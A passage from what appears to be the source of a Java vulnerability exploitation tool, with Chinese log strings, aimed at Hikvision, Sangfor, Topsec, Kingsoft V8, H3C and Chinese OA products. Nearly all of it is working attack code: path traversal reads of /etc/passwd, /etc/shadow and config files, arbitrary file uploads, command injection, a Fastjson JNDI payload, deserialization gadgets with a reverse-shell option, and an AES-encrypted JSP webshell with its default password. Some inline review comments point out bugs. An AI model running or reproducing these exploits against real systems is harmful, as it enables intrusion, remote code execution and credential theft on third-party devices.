text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"); 97 | httpRequest2.Post(data.replace("shellcode",poc)); 98 | Response result = new HttpRequest(target+url2.replace("iconfig.jsp",shellpath)).Get(""); 99 | if(result.responseBody.contains("c0bb4ba866309a864d22f8853e8f7213")&&result.statusCode==200){ 100 | WriteLog("\n[*] 存在漏洞"); 101 | WriteLog("访问:"+target +url2.replace("iconfig.jsp",shellpath)); 102 | }else { 103 | WriteLog("\n[-] 不存在漏洞"); 104 | } 105 | } 106 | } 107 | 108 | @VulnerabilityDescriptionMapping(Description="H3C_H3C_ERXXXG2敏感信息泄露漏洞" ,SupportVulType= SupportVul.信息泄露) 109 | public void vul_H3C_ERXXXG2(Poc_Exp type, String target, Object... args) throws Exception { 110 | WriteLog("\n[*]开始检测: H3C_H3C_ERXXXG2敏感信息泄露漏洞"); 111 | String url = "/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg"; 112 | switch (type) { 113 | case POC: 114 | HttpRequest httpRequest = new HttpRequest(target + url); 115 | Response result = httpRequest.Get(""); 116 | if (result.statusCode == 200 && result.responseBody.contains("$sys@base")) { 117 | WriteLog("\n[*] 存在漏洞"); 118 | WriteLog("\n[*] (burp方包GET)漏洞链接:" + target + url); 119 | } else { 120 | WriteLog("\n[*] 不存在漏洞"); 121 | } 122 | case EXP: 123 | break; 124 | } 125 | } 126 | 127 | } 128 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/HIKVISIONController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.*; 6 | 7 | import java.net.MalformedURLException; 8 | 9 | @BasicMapping(uri = "海康威视") 10 | public class HIKVISIONController extends Controller implements BasicController{ 11 | @VulnerabilityDescriptionMapping(Description = "海康威视综合安防 lm 文件上传漏洞",SupportVulType = 
SupportVul.UploadFile) 12 | public void vul_lm_Uploadfile(Poc_Exp type, String target, Object... args) throws MalformedURLException { 13 | WriteLog("\n[*]开始检测: 海康威视综合安防 lm 文件上传漏洞"); 14 | String randomStr = Utils.getRandomString(4)+".jsp"; 15 | String url = "/lm/api/files;.css"; 16 | String data = "------WebKitFormBoundary9PggsiM755PLa54a\n" + 17 | "Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/lm/filename\"\n" + 18 | "Content-Type: application/zip\n" + 19 | "\n" + 20 | "\n" + 21 | "Yep!\n" + 22 | "------WebKitFormBoundary9PggsiM755PLa54a--"; 23 | switch (type){ 24 | case POC: 25 | data =data.replace("filename",randomStr); 26 | HttpRequest httpRequest = new HttpRequest(target+url); 27 | httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a"); 28 | Response result = httpRequest.Post(data); 29 | if (result.statusCode==200 && result.responseBody.contains(randomStr)){ 30 | WriteLog("\n[*] 存在漏洞"); 31 | WriteLog("\n[*] 访问地址:"+target+"/lm/"+randomStr+";.css"); 32 | }else { 33 | WriteLog("\n[*] 不存在漏洞"); 34 | } 35 | case EXP: 36 | String payload = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>"; 37 | data =data.replace("filename",randomStr); 38 | data =data.replace("Yep!",payload); 39 | HttpRequest httpRequest1 = new HttpRequest(target+url); 40 | httpRequest1.addHeaders("Content-Type","multipart/form-data; 
boundary=----WebKitFormBoundary9PggsiM755PLa54a"); /* NOTE(review): tail of the EXP branch of vul_lm_Uploadfile. The POC case directly above ends without a `break`, so a POC-only run falls through into this EXP branch and uploads the JSP payload as well; add `break;` before `case EXP:` so that a verification run stays non-destructive. */ 41 | Response result1 = httpRequest1.Post(data); 42 | /* Same verdict rule as the POC: HTTP 200 and the random filename echoed back in the body. */ if (result1.statusCode==200 && result1.responseBody.contains(randomStr)){ 43 | WriteLog("\n[*] 存在漏洞"); 44 | WriteLog("\n[*] 访问地址:"+target+"/lm/"+randomStr+";.css"); 45 | WriteLog("\n[*] 默认连接密码rebeyond"); 46 | }else { 47 | WriteLog("\n[*] 不存在漏洞"); 48 | } 49 | } 50 | } 51 | 52 | /** Hikvision (海康威视) iSecure Center "lm" file-read check. POC only - EXP is a no-op. GETs {@code /lm/api/files;.css?link=/etc/passwd} and reports the host as vulnerable when the response is HTTP 200 and the body contains "root". NOTE(review): "root" is a weak indicator - an error or login page that happens to contain the word is a false positive; matching an /etc/passwd-shaped line such as "root:x:0:0" would make the verdict reliable. The ";.css" path-parameter suffix is copied from the published request; why it is needed is not visible from this file. */ @VulnerabilityDescriptionMapping(Description = "海康威视综合安防 lm 文件读取漏洞",SupportVulType = SupportVul.信息泄露) 53 | public void vul_lm_Readfile(Poc_Exp type, String target, Object... args) throws MalformedURLException { 54 | WriteLog("\n[*]开始检测: 海康威视综合安防 lm 文件读取漏洞"); 55 | String url = "/lm/api/files;.css?link=/etc/passwd"; 56 | switch (type){ 57 | case POC: 58 | HttpRequest httpRequest = new HttpRequest(target+url); 59 | Response result = httpRequest.Get(""); 60 | if (result.statusCode==200 && result.responseBody.contains("root")){ 61 | WriteLog("\n[*] 存在漏洞"); 62 | WriteLog("\n[*] 访问地址:"+target+"/lm/api/files;.css?link=/etc/passwd"); 63 | }else { 64 | WriteLog("\n[*] 不存在漏洞"); 65 | } 66 | /* No break: POC falls into EXP, which is only a break, so the fall-through is harmless here. */ case EXP: 67 | break; 68 | } 69 | } 70 | 71 | @VulnerabilityDescriptionMapping(Description = "海康威视综合安防 center 文件上传漏洞",SupportVulType = SupportVul.UploadFile) 72 | public void vul_center(Poc_Exp type, String target, Object... 
args) throws MalformedURLException { 73 | WriteLog("\n[*]开始检测: 海康威视综合安防 center 文件上传漏洞"); 74 | String randomStr = Utils.getRandomString(4)+".jsp"; 75 | String url = "/center/api/files;.html"; 76 | String data = "------WebKitFormBoundary9PggsiM755PLa54a\n" + 77 | "Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/filename\"\n" + 78 | "Content-Type: application/zip\n" + 79 | "\n" + 80 | "Yep!\n" + 81 | "------WebKitFormBoundary9PggsiM755PLa54a--"; 82 | switch (type){ 83 | case POC: 84 | data =data.replace("filename",randomStr); 85 | HttpRequest httpRequest = new HttpRequest(target+url); 86 | httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a"); 87 | Response result = httpRequest.Post(data); 88 | if (result.statusCode==200 && result.responseBody.contains("Yep!")){ 89 | WriteLog("\n[*] 存在漏洞"); 90 | WriteLog("\n[*] 访问地址:"+target+"/portal/ui/login/..;/..;/"+randomStr); 91 | }else { 92 | WriteLog("\n[*] 不存在漏洞"); 93 | } 94 | case EXP: 95 | break; 96 | } 97 | } 98 | 99 | @VulnerabilityDescriptionMapping(Description = "海康威视综合安防 report 文件上传漏洞",SupportVulType = SupportVul.UploadFile) 100 | public void vul_report(Poc_Exp type, String target, Object... 
args) throws MalformedURLException { 101 | WriteLog("\n[*]开始检测: 海康威视综合安防 report 文件上传漏洞"); 102 | String randomStr = Utils.getRandomString(4)+".jsp"; 103 | String url = "/svm/api/external/report"; 104 | String data = "------WebKitFormBoundary9PggsiM755PLa54a\n" + 105 | "Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/filename\"\n" + 106 | "Content-Type: application/zip\n" + 107 | "\n" + 108 | "Yep!\n" + 109 | "------WebKitFormBoundary9PggsiM755PLa54a--"; 110 | switch (type){ 111 | case POC: 112 | data =data.replace("filename",randomStr); 113 | HttpRequest httpRequest = new HttpRequest(target+url); 114 | httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a"); 115 | Response result = httpRequest.Post(data); 116 | if (result.statusCode==200 && result.responseBody.contains("Yep!")){ 117 | WriteLog("\n[*] 存在漏洞"); 118 | WriteLog("\n[*] 访问地址:"+target+"/portal/ui/login/..;/..;/"+randomStr); 119 | }else { 120 | WriteLog("\n[*] 不存在漏洞"); 121 | } 122 | case EXP: 123 | break; 124 | } 125 | } 126 | 127 | @VulnerabilityDescriptionMapping(Description = "海康威视综合安防 iVMS-8700 Fsatjson 漏洞",SupportVulType = SupportVul.Jndi) 128 | public void vul_Fsatjson_Jndi(Poc_Exp type, String target, Object... 
args) throws Exception { 129 | WriteLog("\n[*]开始检测: 海康威视综合安防 iVMS-8700 Fsatjson 漏洞"); 130 | String url = "/bic/ssoService/v1/applyCT"; 131 | String data = "{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://dnslog\",\"autoCommit\":true},\"hfe4zyyzldp\":\"=\"}"; 132 | switch (type){ 133 | case POC: 134 | if (Cache.uiController.DNSDomain.getText().equals("")){ 135 | WriteLog("\n[*] DNS验证类型漏洞 请配置 DNSLOG 地址"); 136 | return; 137 | }else { 138 | DNSLOG.setDomain(Cache.uiController.DNSDomain.getText()); 139 | } 140 | String domain = DNSLOG.getRandomDomain(); 141 | data = data.replace("dnslog",domain); 142 | HttpRequest httpRequest = new HttpRequest(target+url); 143 | httpRequest.addHeaders("Content-Type","application/json"); 144 | httpRequest.Post(data); 145 | WriteLog("\n[*] 请自行判断是否成功。"+domain); 146 | WriteLog("\n[*] 漏洞详情:https://mp.weixin.qq.com/s/CEGjTyhphr2GMuK9zpl5bg"); 147 | case EXP: 148 | break; 149 | } 150 | } 151 | 152 | } 153 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/HuaTianController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | @BasicMapping(uri = "华天动力OA") 10 | public class HuaTianController extends Controller implements BasicController{ 11 | @VulnerabilityDescriptionMapping(Description="华天动力OA 8000版 workFlowService SQL注入漏洞" ,SupportVulType= SupportVul.SQLInjection) 12 | public void vul_Getfile(Poc_Exp type, String target, Object... 
args) throws Exception { 13 | WriteLog("\n开始检测: 华天动力OA 8000版 workFlowService SQL注入漏洞"); 14 | 15 | switch (type){ 16 | case EXP: 17 | break; 18 | case POC: 19 | String data = " \n" + 20 | "getDataListForTree \n" + 21 | "select 'flag'; \n" + 22 | ""; 23 | HttpRequest httpRequest = new HttpRequest(target+"/OAapp/bfapp/buffalo/workFlowService"); 24 | httpRequest.addHeaders("Content-type"," "); 25 | Response result = httpRequest.Post(data); 26 | if(result.responseBody.contains("flag")&&result.statusCode==200){ 27 | WriteLog(" 存在漏洞"); 28 | WriteLog(result.responseBody); 29 | }else { 30 | WriteLog(" 不存在漏洞"); 31 | } 32 | WriteLog("\n"+result.responseBody); 33 | } 34 | } 35 | 36 | } 37 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/JhSoftController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | import java.net.MalformedURLException; 10 | 11 | @BasicMapping(uri="金和OA") 12 | public class JhSoftController extends Controller implements BasicController{ 13 | public JhSoftController(){} 14 | 15 | @VulnerabilityDescriptionMapping(Description = "金和OA C6 download.jsp 任意文件读取漏洞",SupportVulType = SupportVul.信息泄露) 16 | public void vul_DownLoadFile(Poc_Exp type, String target,Object... 
args) throws MalformedURLException { /* JhSoft (金和OA) C6 arbitrary file read check. POC only - EXP is a no-op. GETs .../testbill/dj/download.asp?filename=/c6/web.config and reports the host as vulnerable when the response is HTTP 200 and contains "password". NOTE(review): the annotation on this method names "download.jsp" but the request path is "download.asp" - one of the two is wrong; confirm against the advisory before trusting the description. NOTE(review): the full response body is appended to the log unconditionally below - on a vulnerable host that is the target's web.config, including any connection-string credentials, so the tool's log becomes a secret store; log a short excerpt (or only the verdict) instead. */ 17 | WriteLog("\n开始检测: vul_DownLoadFile"); 18 | 19 | switch (type){ 20 | case EXP: 21 | break; 22 | case POC: 23 | HttpRequest httpRequest = new HttpRequest(target+"/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config"); 24 | String data = ""; 25 | Response result = httpRequest.Get(data); 26 | /* "password" alone also matches login pages and error text; a web.config-specific marker (e.g. "<configuration" or "connectionString") would cut false positives. */ if(result.responseBody.contains("password") && result.statusCode==200){ 27 | WriteLog(" 存在漏洞"); 28 | }else { 29 | WriteLog(" 不存在漏洞"); 30 | } 31 | /* Logged regardless of verdict - this is where the credentials end up in the log. */ WriteLog("\n"+result.responseBody); 32 | } 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/JinShanController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | @BasicMapping(uri = "金山V8") 10 | public class JinShanController extends Controller implements BasicController{ 11 | @VulnerabilityDescriptionMapping(Description="金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞" ,SupportVulType= SupportVul.RuntimeExec) 12 | public void vul_pdf_maker(Poc_Exp type, String target, Object... 
args) throws Exception { 13 | WriteLog("\n[*]开始检测: 金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞"); 14 | 15 | switch (type){ 16 | case EXP: 17 | break; 18 | case POC: 19 | String data = "url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx"; 20 | HttpRequest httpRequest = new HttpRequest(target+"/inter/pdf_maker.php"); 21 | Response result = httpRequest.Post(data); 22 | if(result.responseBody.contains("Windows")&&result.statusCode==200){ 23 | WriteLog(" 存在漏洞"); 24 | WriteLog(result.responseBody); 25 | }else { 26 | WriteLog(" 不存在漏洞"); 27 | } 28 | } 29 | } 30 | @VulnerabilityDescriptionMapping(Description="金山 V8 终端安全系统 downfile.php 任意文件读取漏洞" ,SupportVulType= SupportVul.信息泄露) 31 | public void vul_downfile(Poc_Exp type, String target, Object... args) throws Exception { 32 | WriteLog("\n[*]开始检测: 金山 V8 终端安全系统 downfile.php 任意文件读取漏洞"); 33 | 34 | switch (type){ 35 | case EXP: 36 | break; 37 | case POC: 38 | HttpRequest httpRequest = new HttpRequest(target+"/htmltopdf/downfile.php?filename=downfile.php"); 39 | Response result = httpRequest.Get(""); 40 | if(result.responseBody.contains("/var/www/html/cmd.txt\"]}],\"type\":\"rpc\",\"tid\":17,\"f8839p7rqtj\":\"=\"}"; 15 | switch (type){ 16 | case EXP: 17 | break; 18 | case POC: 19 | new HttpRequest(target+"/directdata/direct/router").Post(data); 20 | Response result = new HttpRequest(target+"/cmd.txt").Get(""); 21 | if(result.responseBody.length()>0&&result.statusCode==200){ 22 | WriteLog("\n[*] 存在漏洞"); 23 | WriteLog("访问:"+target +"/cmd.txt"); 24 | }else { 25 | WriteLog("\n[*] 不存在漏洞"); 26 | } 27 | } 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/SangForController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import 
com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | import java.net.MalformedURLException; 10 | 11 | @BasicMapping(uri = "深信服") 12 | public class SangForController extends Controller implements BasicController{ 13 | @VulnerabilityDescriptionMapping(Description = "深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞",SupportVulType = SupportVul.信息泄露) 14 | public void vul_sys_user信息泄露(Poc_Exp type, String target, Object... args) throws MalformedURLException { 15 | WriteLog("\n[*]开始检测: 深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞"); 16 | 17 | 18 | switch (type){ 19 | case EXP: 20 | break; 21 | case POC: 22 | HttpRequest httpRequest = new HttpRequest(target+"/tmp/updateme/sinfor/ad/sys/sys_user.conf"); 23 | Response result = httpRequest.Get(""); 24 | if((result.responseBody.contains("true") || result.responseBody.contains("admin"))&&result.statusCode==200){ 25 | WriteLog("\n[*] 存在漏洞"); 26 | WriteLog("\n[*]"+result.responseBody); 27 | }else { 28 | WriteLog("\n[*] 不存在漏洞"); 29 | } 30 | } 31 | 32 | } 33 | @VulnerabilityDescriptionMapping(Description = "深信服 应用交付报表系统 download.php 任意文件读取漏洞",SupportVulType = SupportVul.信息泄露) 34 | public void vul_download_文件读取(Poc_Exp type, String target, Object... args) throws MalformedURLException { 35 | WriteLog("\n[*]开始检测: 深信服 应用交付报表系统 download.php 任意文件读取漏洞"); 36 | 37 | 38 | switch (type){ 39 | case EXP: 40 | break; 41 | case POC: 42 | HttpRequest httpRequest = new HttpRequest(target+"/report/download.php?pdf=../../../../../etc/passwd"); 43 | Response result = httpRequest.Get(""); 44 | if(result.responseBody.contains("root")&&result.statusCode==200){ 45 | WriteLog("\n[*] 存在漏洞"); 46 | WriteLog("\n[*]"+result.responseBody); 47 | }else { 48 | WriteLog("\n[*] 不存在漏洞"); 49 | } 50 | } 51 | } 52 | 53 | @VulnerabilityDescriptionMapping(Description = "深信服 行为感知系统/日志中心 c.php 远程命令执行漏洞",SupportVulType = SupportVul.RuntimeExec) 54 | public void vul_c_命令执行(Poc_Exp type, String target, Object... 
args) throws MalformedURLException { 55 | WriteLog("\n[*]开始检测: 深信服 行为感知系统/日志中心 c.php 远程命令执行漏洞"); 56 | 57 | 58 | switch (type){ 59 | case EXP: 60 | break; 61 | case POC: 62 | HttpRequest httpRequest = new HttpRequest(target+"/tool/log/c.php?strip_slashes=system&host=echo%20flag"); 63 | Response result = httpRequest.Get(""); 64 | if(result.responseBody.contains("flag")&&result.statusCode==200){ 65 | WriteLog("\n[*] 存在漏洞"); 66 | WriteLog("\n[*]请求地址:"+target+"/tool/log/c.php?strip_slashes=system&host=echo%20flag"); 67 | WriteLog("\n"+result.responseBody); 68 | }else { 69 | WriteLog("\n[*] 不存在漏洞"); 70 | } 71 | } 72 | } 73 | // @VulnerabilityDescriptionMapping(Description = "深信服 终端检测检测平台 ui/login.php 任意用户登录漏洞",SupportVulType = SupportVul.信息泄露) 74 | // public void vul_loginBypass(Poc_Exp type, String target, Object... args) throws MalformedURLException { 75 | // Cache.uiController.logTextArea.appendText("\n[*]开始检测: 深信服 终端检测检测平台 ui/login.php 任意用户登录漏洞"); 76 | // 77 | // switch (type){ 78 | // case EXP: 79 | // break; 80 | // case POC: 81 | // HttpRequest httpRequest = new HttpRequest(target+"/ui/login.php?User=admin"); 82 | // Response result = httpRequest.Get(""); 83 | // if(result.statusCode==200){ 84 | // WriteLog("\n[*] 存在漏洞"); 85 | // WriteLog("\n[*] 请求地址:"+target+"/ui/login.php?user=admin"); 86 | // }else { 87 | // WriteLog("\n[*] 不存在漏洞"); 88 | // } 89 | // } 90 | // } 91 | 92 | 93 | } 94 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/SerializedDataController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | 4 | import com.achuna33.Exceptions.IncorrectParamsException; 5 | import com.achuna33.Exceptions.UnSupportedGadgetTypeException; 6 | import com.achuna33.Exceptions.UnSupportedPayloadTypeException; 7 | import com.achuna33.Gadgets.*; 8 | import com.achuna33.SupportType.GadgetType; 9 | import 
com.achuna33.SupportType.PayloadType; 10 | 11 | import com.achuna33.Utils.Cache; 12 | import com.achuna33.Utils.Utils; 13 | 14 | public class SerializedDataController { 15 | private GadgetType gadgetType; 16 | private PayloadType payloadType; 17 | private String[] params; 18 | 19 | 20 | public byte[] getResult(String base) throws Exception { 21 | System.out.println("[+] Start create javaSerializedData :" + base + " with javaSerializedData attribute"); 22 | Cache.uiController.PublicArea.appendText("\n[+] Start create javaSerializedData :" + base + " with javaSerializedData attribute"); 23 | 24 | //这个方法里面有改动,其他基本无改动 25 | byte[] bytes = null; 26 | Object obj = null; 27 | switch (gadgetType){ 28 | case urldns: 29 | bytes = URLDNS.getBytes(params[0]); 30 | break; 31 | case commonsbeanutils1: 32 | bytes = CommonsBeanutils1.getBytes(payloadType, params); 33 | break; 34 | case commonsbeanutils2: 35 | bytes = CommonsBeanutils2.getBytes(payloadType, params); 36 | break; 37 | case commonscollectionsk1: 38 | bytes = CommonsCollectionsK1.getBytes(payloadType, params); 39 | break; 40 | case commonscollectionsk2: 41 | bytes = CommonsCollectionsK2.getBytes(payloadType, params); 42 | break; 43 | case jdk7u21: 44 | bytes = Jdk7u21.getBytes(payloadType, params); 45 | break; 46 | case jre8u20: 47 | bytes = Jre8u20.getBytes(payloadType, params); 48 | break; 49 | case c3p0: 50 | bytes = C3P0.getBytes(payloadType, params); 51 | break; 52 | } 53 | return bytes; 54 | } 55 | 56 | 57 | public void process(String base) throws UnSupportedPayloadTypeException, IncorrectParamsException, UnSupportedGadgetTypeException { 58 | try{ 59 | int firstIndex = base.indexOf("/"); 60 | int secondIndex = base.indexOf("/", firstIndex + 1); 61 | try{ 62 | gadgetType = GadgetType.valueOf(base.substring(firstIndex + 1, secondIndex).toLowerCase()); 63 | System.out.println("[+] GaddgetType: " + gadgetType); 64 | Cache.uiController.PublicArea.appendText("\n[+] GaddgetType: " + gadgetType); 65 | 
}catch(IllegalArgumentException e){ 66 | throw new UnSupportedGadgetTypeException("UnSupportGaddgetType: " + base.substring(firstIndex + 1, secondIndex)); 67 | } 68 | 69 | if(gadgetType == GadgetType.urldns){ 70 | String url = "http://" + base.substring(base.lastIndexOf("/") + 1); 71 | System.out.println("[+] URL: " + url); 72 | Cache.uiController.PublicArea.appendText("\n[+] URL: " + url); 73 | 74 | params = new String[]{url}; 75 | return; 76 | } 77 | 78 | int thirdIndex = base.indexOf("/", secondIndex + 1); 79 | if(thirdIndex < 0) thirdIndex = base.length(); 80 | try{ 81 | payloadType = PayloadType.valueOf(base.substring(secondIndex + 1, thirdIndex).toLowerCase()); 82 | System.out.println("[+] PayloadType: " + payloadType); 83 | Cache.uiController.PublicArea.appendText("\n[+] PayloadType: " + payloadType); 84 | 85 | }catch (IllegalArgumentException e){ 86 | throw new UnSupportedPayloadTypeException("UnSupportedPayloadType: " + base.substring(secondIndex + 1, thirdIndex)); 87 | } 88 | 89 | switch(payloadType){ 90 | case dnslog: 91 | String url = base.substring(base.lastIndexOf("/") + 1); 92 | System.out.println("[+] URL: " + url); 93 | Cache.uiController.PublicArea.appendText("\n[+] URL: " + url); 94 | 95 | params = new String[]{url}; 96 | break; 97 | case command: 98 | String cmd = Utils.getCmdFromBase(base); 99 | System.out.println("[+] Command: " + cmd); 100 | Cache.uiController.PublicArea.appendText("\n[+] Command: " + cmd); 101 | 102 | params = new String[]{cmd}; 103 | break; 104 | case reverseshell: 105 | String[] results = Utils.getIPAndPortFromBase(base); 106 | System.out.println("[+] IP: " + results[0]); 107 | System.out.println("[+] Port: " + results[1]); 108 | Cache.uiController.PublicArea.appendText("\n[+] IP: " + results[0]); 109 | Cache.uiController.PublicArea.appendText("\n[+] Port: " + results[1]); 110 | 111 | params = results; 112 | break; 113 | case putfile: 114 | //文件中‘/’ 用 _] 替换 ‘+’用 115 | String[] result = Utils.getPathAndContent(base); 116 | 
System.out.println("[+] Path:" + result[0]); 117 | System.out.println("[+] Content:" + result[1]); 118 | Cache.uiController.PublicArea.appendText("\n[+] Path:" + result[0]); 119 | Cache.uiController.PublicArea.appendText("\n[+] Content:" + result[1]); 120 | params = result; 121 | break; 122 | case commandecho: 123 | //文件中‘/’ 用 _] 替换 ‘+’用 124 | String[] commandechoResult = Utils.getcommandechoArgs(base); 125 | System.out.println("[+] uri:" + commandechoResult[0]); 126 | System.out.println("[+] cmd:" + commandechoResult[1]); 127 | Cache.uiController.PublicArea.appendText("\n[+] uri:" + commandechoResult[0]); 128 | Cache.uiController.PublicArea.appendText("\n[+] cmd:" + commandechoResult[1]); 129 | 130 | params = commandechoResult; 131 | break; 132 | } 133 | 134 | }catch(Exception e){ 135 | if(e instanceof UnSupportedPayloadTypeException) throw (UnSupportedPayloadTypeException)e; 136 | if(e instanceof UnSupportedGadgetTypeException) throw (UnSupportedGadgetTypeException)e; 137 | 138 | throw new IncorrectParamsException("Incorrect params: " + base); 139 | } 140 | } 141 | } 142 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/TRXController.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.Poc_Exp; 4 | import com.achuna33.SupportType.SupportVul; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.HttpRequest; 7 | import com.achuna33.Utils.Response; 8 | 9 | import java.net.MalformedURLException; 10 | 11 | @BasicMapping(uri = "天融信") 12 | public class TRXController extends Controller implements BasicController{ 13 | @VulnerabilityDescriptionMapping(Description = "天融信 上网行为管理系统 static_convert.php 远程命令执行漏洞",SupportVulType = SupportVul.RuntimeExec) 14 | public void vul_c_命令执行(Poc_Exp type, String target, Object... 
args) throws MalformedURLException { /* 天融信 (Topsec) internet behaviour management static_convert.php command-injection check. POC only - EXP is a no-op. NOTE(review): this "PoC" is not read-only: the injected value decodes to `|| echo 'testasdtest' >> /var/www/html/config_application.txt`, i.e. every run appends a marker line to a file inside the target's web root and leaves it there. NOTE(review): the marker "testasdtest" is static and the verdict is taken from the second request only (the first response, `result`, is never inspected), so a host marked by an earlier run - by this operator or anyone else running the tool - keeps reporting "vulnerable" even after the injection itself is fixed; a per-run random marker would at least tie the verdict to this run. */ 15 | WriteLog("\n开始检测: vul_c_命令执行"); 16 | 17 | 18 | switch (type){ 19 | case EXP: 20 | break; 21 | case POC: 22 | HttpRequest httpRequest = new HttpRequest(target+"/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27testasdtest%27%20%3E%3E%20/var/www/html/config_application.txt%0a"); 23 | Response result = httpRequest.Get(""); 24 | /* Fetch the file the injected echo should have appended to and look for the marker. */ HttpRequest httpRequest1 = new HttpRequest(target+"/config_application.txt"); 25 | Response result1 = httpRequest1.Get(""); 26 | 27 | if(result1.responseBody.contains("testasdtest")&&result1.statusCode==200){ 28 | WriteLog("\n 存在漏洞"); 29 | WriteLog("\n请求地址:"+target+"/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27testasdtest%27%20%3E%3E%20/var/www/html/config_application.txt%0a"); 30 | WriteLog("\n"+result1.responseBody); 31 | }else { 32 | WriteLog("\n 不存在漏洞"); 33 | } 34 | } 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/VulnerabilityDescriptionMapping.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Controllers; 2 | 3 | import com.achuna33.SupportType.SupportVul; 4 | 5 | import java.lang.annotation.ElementType; 6 | import java.lang.annotation.Retention; 7 | import java.lang.annotation.RetentionPolicy; 8 | import java.lang.annotation.Target; 9 | 10 | /** Marks a controller method as one vulnerability check: {@code Description} is the human-readable title and {@code SupportVulType} the SupportVul category. Runtime-retained and method-only, so presumably discovered reflectively by the UI - the reader is not visible in this file. */ @Retention(RetentionPolicy.RUNTIME) 11 | @Target(ElementType.METHOD) 12 | public @interface VulnerabilityDescriptionMapping { 13 | String Description(); 14 | SupportVul SupportVulType(); 15 | } 16 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Controllers/XYController.java: -------------------------------------------------------------------------------- 1 | 2 | package com.achuna33.Controllers; 3 | 4 | import com.achuna33.SupportType.Poc_Exp; 5 | import com.achuna33.SupportType.SupportVul; 6 | import 
com.achuna33.Utils.Cache; 7 | import com.achuna33.Utils.HttpRequest; 8 | import com.achuna33.Utils.Response; 9 | 10 | import java.net.MalformedURLException; 11 | 12 | @BasicMapping(uri = "小鱼") 13 | public class XYController extends Controller implements BasicController{ 14 | @VulnerabilityDescriptionMapping(Description = "小鱼互联 任意文件读取",SupportVulType = SupportVul.信息泄露) 15 | public void vul_read(Poc_Exp type, String target, Object... args) throws MalformedURLException { 16 | WriteLog("\n开始检测: vul_read_任意文件读取"); 17 | 18 | 19 | switch (type){ 20 | case EXP: 21 | break; 22 | case POC: 23 | HttpRequest httpRequest = new HttpRequest(target+"/download.action"); 24 | String data = "filename=../../../../../../../../../../../etc/././shadow"; 25 | Response result = httpRequest.Post(data); 26 | 27 | 28 | if(result.responseBody.contains("root")&&result.statusCode==200){ 29 | WriteLog("\n 存在漏洞"); 30 | WriteLog("\n请求地址:"+target+"/download.action\r\n"); 31 | 32 | 